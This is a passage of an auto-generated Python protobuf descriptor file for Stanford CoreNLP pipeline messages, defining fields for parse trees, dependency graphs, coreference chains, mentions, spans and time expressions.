number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='index', full_name='edu.stanford.nlp.pipeline.Quote.index', index=8,
number=10, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=2943,
serialized_end=3104,
)
_PARSETREE = _descriptor.Descriptor(
name='ParseTree',
full_name='edu.stanford.nlp.pipeline.ParseTree',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='child', full_name='edu.stanford.nlp.pipeline.ParseTree.child', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='edu.stanford.nlp.pipeline.ParseTree.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='yieldBeginIndex', full_name='edu.stanford.nlp.pipeline.ParseTree.yieldBeginIndex', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='yieldEndIndex', full_name='edu.stanford.nlp.pipeline.ParseTree.yieldEndIndex', index=3,
number=4, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='score', full_name='edu.stanford.nlp.pipeline.ParseTree.score', index=4,
number=5, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentiment', full_name='edu.stanford.nlp.pipeline.ParseTree.sentiment', index=5,
number=6, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=3107,
serialized_end=3306,
)
_DEPENDENCYGRAPH_NODE = _descriptor.Descriptor(
name='Node',
full_name='edu.stanford.nlp.pipeline.DependencyGraph.Node',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='sentenceIndex', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Node.sentenceIndex', index=0,
number=1, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='index', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Node.index', index=1,
number=2, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='copyAnnotation', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Node.copyAnnotation', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=3472,
serialized_end=3540,
)
_DEPENDENCYGRAPH_EDGE = _descriptor.Descriptor(
name='Edge',
full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.source', index=0,
number=1, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='target', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.target', index=1,
number=2, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dep', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.dep', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='isExtra', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.isExtra', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sourceCopy', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.sourceCopy', index=4,
number=5, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='targetCopy', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.targetCopy', index=5,
number=6, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='language', full_name='edu.stanford.nlp.pipeline.DependencyGraph.Edge.language', index=6,
number=7, type=14, cpp_type=8, label=1,
has_default_value=True, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=3543,
serialized_end=3715,
)
_DEPENDENCYGRAPH = _descriptor.Descriptor(
name='DependencyGraph',
full_name='edu.stanford.nlp.pipeline.DependencyGraph',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='node', full_name='edu.stanford.nlp.pipeline.DependencyGraph.node', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='edge', full_name='edu.stanford.nlp.pipeline.DependencyGraph.edge', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='root', full_name='edu.stanford.nlp.pipeline.DependencyGraph.root', index=2,
number=3, type=13, cpp_type=3, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=_descriptor._ParseOptions(descriptor_pb2.FieldOptions(), _b('\020\001'))),
],
extensions=[
],
nested_types=[_DEPENDENCYGRAPH_NODE, _DEPENDENCYGRAPH_EDGE, ],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=3309,
serialized_end=3715,
)
_COREFCHAIN_COREFMENTION = _descriptor.Descriptor(
name='CorefMention',
full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mentionID', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.mentionID', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentionType', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.mentionType', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='number', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.number', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='gender', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.gender', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='animacy', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.animacy', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='beginIndex', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.beginIndex', index=5,
number=6, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='endIndex', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.endIndex', index=6,
number=7, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headIndex', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.headIndex', index=7,
number=9, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentenceIndex', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.sentenceIndex', index=8,
number=10, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='position', full_name='edu.stanford.nlp.pipeline.CorefChain.CorefMention.position', index=9,
number=11, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=3843,
serialized_end=4044,
)
_COREFCHAIN = _descriptor.Descriptor(
name='CorefChain',
full_name='edu.stanford.nlp.pipeline.CorefChain',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='chainID', full_name='edu.stanford.nlp.pipeline.CorefChain.chainID', index=0,
number=1, type=5, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mention', full_name='edu.stanford.nlp.pipeline.CorefChain.mention', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='representative', full_name='edu.stanford.nlp.pipeline.CorefChain.representative', index=2,
number=3, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_COREFCHAIN_COREFMENTION, ],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=3718,
serialized_end=4044,
)
_MENTION = _descriptor.Descriptor(
name='Mention',
full_name='edu.stanford.nlp.pipeline.Mention',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='mentionID', full_name='edu.stanford.nlp.pipeline.Mention.mentionID', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentionType', full_name='edu.stanford.nlp.pipeline.Mention.mentionType', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='number', full_name='edu.stanford.nlp.pipeline.Mention.number', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='gender', full_name='edu.stanford.nlp.pipeline.Mention.gender', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='animacy', full_name='edu.stanford.nlp.pipeline.Mention.animacy', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='person', full_name='edu.stanford.nlp.pipeline.Mention.person', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='startIndex', full_name='edu.stanford.nlp.pipeline.Mention.startIndex', index=6,
number=7, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='endIndex', full_name='edu.stanford.nlp.pipeline.Mention.endIndex', index=7,
number=9, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headIndex', full_name='edu.stanford.nlp.pipeline.Mention.headIndex', index=8,
number=10, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headString', full_name='edu.stanford.nlp.pipeline.Mention.headString', index=9,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='nerString', full_name='edu.stanford.nlp.pipeline.Mention.nerString', index=10,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='originalRef', full_name='edu.stanford.nlp.pipeline.Mention.originalRef', index=11,
number=13, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='goldCorefClusterID', full_name='edu.stanford.nlp.pipeline.Mention.goldCorefClusterID', index=12,
number=14, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='corefClusterID', full_name='edu.stanford.nlp.pipeline.Mention.corefClusterID', index=13,
number=15, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentionNum', full_name='edu.stanford.nlp.pipeline.Mention.mentionNum', index=14,
number=16, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentNum', full_name='edu.stanford.nlp.pipeline.Mention.sentNum', index=15,
number=17, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='utter', full_name='edu.stanford.nlp.pipeline.Mention.utter', index=16,
number=18, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='paragraph', full_name='edu.stanford.nlp.pipeline.Mention.paragraph', index=17,
number=19, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='isSubject', full_name='edu.stanford.nlp.pipeline.Mention.isSubject', index=18,
number=20, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='isDirectObject', full_name='edu.stanford.nlp.pipeline.Mention.isDirectObject', index=19,
number=21, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='isIndirectObject', full_name='edu.stanford.nlp.pipeline.Mention.isIndirectObject', index=20,
number=22, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='isPrepositionObject', full_name='edu.stanford.nlp.pipeline.Mention.isPrepositionObject', index=21,
number=23, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasTwin', full_name='edu.stanford.nlp.pipeline.Mention.hasTwin', index=22,
number=24, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='generic', full_name='edu.stanford.nlp.pipeline.Mention.generic', index=23,
number=25, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='isSingleton', full_name='edu.stanford.nlp.pipeline.Mention.isSingleton', index=24,
number=26, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasBasicDependency', full_name='edu.stanford.nlp.pipeline.Mention.hasBasicDependency', index=25,
number=27, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasEnhancedDepenedncy', full_name='edu.stanford.nlp.pipeline.Mention.hasEnhancedDepenedncy', index=26,
number=28, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hasContextParseTree', full_name='edu.stanford.nlp.pipeline.Mention.hasContextParseTree', index=27,
number=29, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headIndexedWord', full_name='edu.stanford.nlp.pipeline.Mention.headIndexedWord', index=28,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dependingVerb', full_name='edu.stanford.nlp.pipeline.Mention.dependingVerb', index=29,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headWord', full_name='edu.stanford.nlp.pipeline.Mention.headWord', index=30,
number=32, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='speakerInfo', full_name='edu.stanford.nlp.pipeline.Mention.speakerInfo', index=31,
number=33, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sentenceWords', full_name='edu.stanford.nlp.pipeline.Mention.sentenceWords', index=32,
number=50, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='originalSpan', full_name='edu.stanford.nlp.pipeline.Mention.originalSpan', index=33,
number=51, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dependents', full_name='edu.stanford.nlp.pipeline.Mention.dependents', index=34,
number=52, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='preprocessedTerms', full_name='edu.stanford.nlp.pipeline.Mention.preprocessedTerms', index=35,
number=53, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='appositions', full_name='edu.stanford.nlp.pipeline.Mention.appositions', index=36,
number=54, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='predicateNominatives', full_name='edu.stanford.nlp.pipeline.Mention.predicateNominatives', index=37,
number=55, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='relativePronouns', full_name='edu.stanford.nlp.pipeline.Mention.relativePronouns', index=38,
number=56, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='listMembers', full_name='edu.stanford.nlp.pipeline.Mention.listMembers', index=39,
number=57, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='belongToLists', full_name='edu.stanford.nlp.pipeline.Mention.belongToLists', index=40,
number=58, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=4047,
serialized_end=5182,
)
_INDEXEDWORD = _descriptor.Descriptor(
name='IndexedWord',
full_name='edu.stanford.nlp.pipeline.IndexedWord',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='sentenceNum', full_name='edu.stanford.nlp.pipeline.IndexedWord.sentenceNum', index=0,
number=1, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tokenIndex', full_name='edu.stanford.nlp.pipeline.IndexedWord.tokenIndex', index=1,
number=2, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='docID', full_name='edu.stanford.nlp.pipeline.IndexedWord.docID', index=2,
number=3, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='copyCount', full_name='edu.stanford.nlp.pipeline.IndexedWord.copyCount', index=3,
number=4, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5184,
serialized_end=5272,
)
_SPEAKERINFO = _descriptor.Descriptor(
name='SpeakerInfo',
full_name='edu.stanford.nlp.pipeline.SpeakerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='speakerName', full_name='edu.stanford.nlp.pipeline.SpeakerInfo.speakerName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='mentions', full_name='edu.stanford.nlp.pipeline.SpeakerInfo.mentions', index=1,
number=2, type=5, cpp_type=1, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5274,
serialized_end=5326,
)
_SPAN = _descriptor.Descriptor(
name='Span',
full_name='edu.stanford.nlp.pipeline.Span',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='begin', full_name='edu.stanford.nlp.pipeline.Span.begin', index=0,
number=1, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='end', full_name='edu.stanford.nlp.pipeline.Span.end', index=1,
number=2, type=13, cpp_type=3, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5328,
serialized_end=5362,
)
_TIMEX = _descriptor.Descriptor(
name='Timex',
full_name='edu.stanford.nlp.pipeline.Timex',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='edu.stanford.nlp.pipeline.Timex.value', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='altValue', full_name='edu.stanford.nlp.pipeline.Timex.altValue', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='text', full_name='edu.stanford.nlp.pipeline.Timex.text', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='type', full_name='edu.stanford.nlp.pipeline.Timex.type', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tid', full_name='edu.stanford.nlp.pipeline.Timex.tid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='beginPoint', full_name='edu.stanford.nlp.pipeline.Timex.beginPoint', index=5,
number=6, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='endPoint', full_name='edu.stanford.nlp.pipeline.Timex.endPoint', index=6,
number=7, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
extension_ranges=[],
oneofs=[
],
serialized_start=5364,
serialized_end=5483,
)
_ENTITY = _descriptor.Descriptor(
name='Entity',
full_name='edu.stanford.nlp.pipeline.Entity',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='headStart', full_name='edu.stanford.nlp.pipeline.Entity.headStart', index=0,
number=6, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='headEnd', full_name='edu.stanford.nlp.pipeline.Entity.headEnd', index=1,
number=7, type=13, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
